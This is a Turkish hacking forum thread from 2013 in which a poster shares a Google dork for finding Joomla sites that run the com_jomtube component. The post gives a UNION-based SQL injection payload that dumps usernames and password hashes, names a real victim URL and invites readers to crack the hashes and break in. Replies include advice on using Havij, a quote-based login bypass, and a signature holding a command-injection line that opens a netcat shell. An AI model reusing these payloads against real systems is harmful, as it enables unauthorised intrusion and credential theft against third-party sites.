THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Joomla SQL Injection

Black-Spy' - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2013
Nereden:
İstanbul
Mesajlar:
6.041
Konular:
969
Teşekkür (Etti):
4227
Teşekkür (Aldı):
6364
Ticaret:
(0) %
10-06-2013 00:25
#1
Joomla SQL Injection
Konu Başlığına Bakınca Size Çok Garip gelebilir çünkü hepimiz joomla sitelerine sql'den çok brute force ile dalıyoruz Öncelikle Dork'umuz var.
Kod:
inurl:/index.php?option=com_jomtube
Bu dork ile sitelerimizi googleden arıyoruz. Daha sonra sitemizi bulduktan sonra exploitimizi yapıştırıyoruz.

Kod:
view=videos&type=member&user_id=-62+union+select+1,2,password,4,5,6,7,8,9,10,11,12, group_concat(0x3a5f,username,0x3a,activation,0x5f3 a),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ jos_users--&option=com_jomtube
Bundan sonra zaten username - password çıkıyor.

Örnek Site :
Kod:
http://tedxoporto.com/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%280x3a5f,username,0x3a,activation,0x5f3a%29,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
Burda MD5 Olarak çıktı şifre kıran olursa girsin hacklesin
---------------------
Sizin dediğiniz ”Vatan” dağda başlayıp çöplükte biter. Bizim bildiğimiz ”Vatan” yürekte başlayıp ”ŞEHADETLE” biter!

http://i.hizliresim.com/GkVJEb.gif

@blackspy_tht
blackspy@turkhackteam.info
AercD007, WhooLe Teşekkür etti.
wwantedd - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
154
Konular:
36
Teşekkür (Etti):
2
Teşekkür (Aldı):
1
Ticaret:
(0) %
10-06-2013 00:27
#2
siyah-spy kardeşim sana bir sorum olacak benim amacım hazır kodu google dedeye sorup açık site bulmak değil de direk hedefe yönelmek mesela bir site var sql açığı var açıkdan biri bu http://k1306.hizliresim.com/1b/9/nyqdq.png mesela ama benim sorunum havijde hedef kısmına ne yazacağım o dorku nasl bulucam dörtgen içindeki kodu yazınca olması gerekn olmuyor lütfen yardım eder misin ????
Black-Spy' - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2013
Nereden:
İstanbul
Mesajlar:
6.041
Konular:
969
Teşekkür (Etti):
4227
Teşekkür (Aldı):
6364
Ticaret:
(0) %
10-06-2013 00:28
#3
Flood Yapma Dostum.
---------------------
Sizin dediğiniz ”Vatan” dağda başlayıp çöplükte biter. Bizim bildiğimiz ”Vatan” yürekte başlayıp ”ŞEHADETLE” biter!

http://i.hizliresim.com/GkVJEb.gif

@blackspy_tht
blackspy@turkhackteam.info
DreamTea - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Mesajlar:
84
Konular:
11
Teşekkür (Etti):
139
Teşekkür (Aldı):
18
Ticaret:
(0) %
10-06-2013 10:10
#4
keske resimle anlatsaydın ben yeniyimde yapamadım
---------------------

Teşekkürü Unutma !
AercD007 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Mesajlar:
920
Konular:
111
Teşekkür (Etti):
24
Teşekkür (Aldı):
77
Ticaret:
(0) %
10-06-2013 10:30
#5
Teşekürler Yardımcı Oldu
WhooLe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hunger Games
Mesajlar:
1.699
Konular:
152
Teşekkür (Etti):
795
Teşekkür (Aldı):
420
Ticaret:
(0) %
10-06-2013 10:59
#6
Teşekkürler ,Hangi yılın exploiti?
---------------------
Allah'a Emanet kardeşlerim ,abilerim.

Duydumki LeBlanc nerf atmışsın rito ama unutmaki babanın s4de 2000 LeBlanc oyunu var.

The Master of LeBlanc.
db43 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
root@db43
Mesajlar:
807
Konular:
51
Teşekkür (Etti):
13
Teşekkür (Aldı):
114
Ticaret:
(0) %
10-06-2013 11:24
#7
Alıntı:
wwantedd´isimli üyeden Alıntı Mesajı göster
siyah-spy kardeşim sana bir sorum olacak benim amacım hazır kodu google dedeye sorup açık site bulmak değil de direk hedefe yönelmek mesela bir site var sql açığı var açıkdan biri bu http://k1306.hizliresim.com/1b/9/nyqdq.png mesela ama benim sorunum havijde hedef kısmına ne yazacağım o dorku nasl bulucam dörtgen içindeki kodu yazınca olması gerekn olmuyor lütfen yardım eder misin ????
Havijde yazacağın direk site adresi gönderdiğin sitede injection yapılmış halini yaptığı istem(request'i böyle çevirdim)'i gösteriyor örneğin
Kod:
www.db43.com/product.php?id=4
fakat saldırı yapmak istediğin sitenin havij'e yazacağın sayfasının uzantısının .asp .php .jsp ya da .cgi olması lazım.fakat ben derim ki sql inj. başlarken ilk admin panellerine 'or''=' girerek uğraş veritabanı mantığını öğren sql , database çeşitleri hangi serverlarda hangileri kullanılır server özellikleri nedir vs. öğren sonra haviji kullandığında vay baksana adam time based sql inj. benim yerime yapıyor böyle rahatlık yok de
--------------------- Linux İşletim Sistemi-Backtrack-Kali Linux Dersleri

Electronics - Communication Eng.

Kod:
192.168.1.1 ; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l 4444 > /tmp/pipe
$nc xxx.xxx.xxx.xxx 4444
DreamTea - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Mesajlar:
84
Konular:
11
Teşekkür (Etti):
139
Teşekkür (Aldı):
18
Ticaret:
(0) %
10-06-2013 15:12
#8
yapamadım .s
---------------------

Teşekkürü Unutma !

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler